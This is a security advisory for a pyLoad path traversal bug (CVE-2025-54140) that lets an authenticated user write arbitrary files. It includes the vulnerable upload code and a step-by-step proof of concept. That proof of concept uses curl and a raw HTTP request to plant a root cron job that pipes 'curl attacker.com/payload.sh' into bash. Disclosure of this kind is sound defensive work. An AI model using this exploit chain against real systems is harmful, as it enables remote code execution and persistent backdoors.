GHSA-xqpg-92fq-grfg
`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write
상세
## Summary An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of the `pyLoad` By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to:
* **Remote Code Execution (RCE)** * **Local Privilege Escalation** * **System-wide compromise** * **Persistence and backdoors**
---
### Vulnerable Code
File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109)
```python @json_blueprint.route("/upload", methods=["POST"]) def upload(): dir_path = api.get_config_value("general", "storage_folder") for file in request.files.getlist("file"): file_path = os.path.join(dir_path, "tmp_" + file.filename) file.save(file_path) ``` **Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences.
### (Proof of Concept)
1. **Clone and install pyLoad from source** (`pip install pyload-ng`):
```bash git clone https://github.com/pyload/pyload cd pyload git checkout 0.4.20 python -m pip install -e . pyload --userdir=/tmp/pyload ```
2. **Or install via pip (PyPi) in virtualenv:**
```bash python -m venv pyload-env source pyload-env/bin/activate pip install pyload==0.4.20 pyload ```
1. **Login and obtain session token** ```bash curl -c cookies.txt -X POST http://127.0.0.1:8000/login \ -d "username=admin&password=admin" ```
2. **Create malicious cron payload** ```bash echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit ```
3. **Upload file with path traversal filename** ```bash curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \ -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor" ```
4. On the next cron tick, a reverse shell or payload will be triggered.
### BurpSuite HTTP Request
``` POST /json/upload HTTP/1.1 Host: 127.0.0.1:8000 Cookie: session=SESSION_ID_HERE Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e
--------------------------d74496d66958873e Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor" Content-Type: application/octet-stream
*/1 * * * * root curl http://attacker.com/payload.sh | bash --------------------------d74496d66958873e-- ```
이 버전이 영향받나요?
사용 중인 패키지 버전을 입력하면 즉시 평가합니다.
영향 패키지
0.5.0b3.dev89 수정 버전: 0.5.0b3.dev90 pip install --upgrade 'pyload-ng>=0.5.0b3.dev90' 참고
- https://github.com/pyload/pyload/security/advisories/GHSA-xqpg-92fq-grfg [WEB]
- https://nvd.nist.gov/vuln/detail/CVE-2025-54140 [ADVISORY]
- https://github.com/pyload/pyload/commit/fc4b136e9c4e7dcbb8e467ae802cb2c3f70a71b0 [WEB]
- https://github.com/pyload/pyload [PACKAGE]
- https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109 [WEB]